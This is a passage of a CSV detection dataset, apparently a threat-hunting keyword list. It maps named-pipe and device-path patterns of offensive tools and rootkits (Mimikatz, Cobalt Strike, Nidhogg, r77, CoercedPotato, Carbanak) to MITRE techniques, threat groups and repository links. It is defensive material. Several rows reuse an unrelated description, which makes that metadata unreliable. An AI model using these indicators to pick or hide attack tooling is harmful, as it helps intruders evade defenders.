tool","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","13611" "*\\??\\Nidhogg*",".{0,1000}\\\\\?\?\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - 
T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13612" "*\\\\*\\*\\Get-FileLockProcess.ps1*",".{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}\\\\Get\-FileLockProcess\.ps1.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","13613" "*\\\\*\\share\\test.bin*",".{0,1000}\\\\\\\\.{0,1000}\\\\share\\\\test\.bin.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","13614" "*\\\\.\\*\\*\\*\\smile.txt\*",".{0,1000}\\\\\\\\\.\\\\.{0,1000}\\\\.{0,1000}\\\\.{0,1000}\\\\smile\.txt\\.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","13615" "*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","N/A","10","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","13621" "*\\\\.\\Cronos*",".{0,1000}\\\\\\\\\.\\\\Cronos.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","13623" "*\\\\.\\pipe\\"" MIMIKATZ*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\\""\sMIMIKATZ.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content #namedpipe","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","13624" "*\\\\.\\pipe\\$77childproc64*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\\$77childproc64.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13625" "*\\\\.\\pipe\\bypassuac*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\bypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13626" "*\\\\.\\pipe\\coerced\\pipe\\spoolss*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#namedpipe","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","13627" "*\\\\.\\pipe\\coerced\\pipe\\srvsvc*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#namedpipe","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","13628" "*\\\\.\\pipe\\EasySystem*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\EasySystem.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#namedpipe","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","13629" "*\\\\.\\pipe\\ElevationPipe*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ElevationPipe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#namedpipe","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13630" "*\\\\.\\pipe\\hashdump*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\hashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses 
LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13631" "*\\\\.\\pipe\\innocent*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\innocent.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#namedpipe","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","13632" "*\\\\.\\pipe\\ioring_in*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_in.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#namedpipe","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","13633" "*\\\\.\\pipe\\ioring_out*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_out.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#namedpipe","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","13634" "*\\\\.\\pipe\\keylogger*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13635" "*\\\\.\\pipe\\mal*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\mal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","#namedpipe","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","13636" "*\\\\.\\pipe\\merlin*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#namedpipe","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","13637" "*\\\\.\\pipe\\mimikatz*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\mimikatz.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13638" "*\\\\.\\pipe\\netview*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\netview.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13639" "*\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13640" "*\\\\.\\pipe\\portscan*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13641" 
"*\\\\.\\pipe\\RemoteMaint*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\RemoteMaint.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#namedpipe","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13642" "*\\\\.\\pipe\\screenshot*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\screenshot.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - 
Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13643" "*\\\\.\\pipe\\sshagent*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\sshagent.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
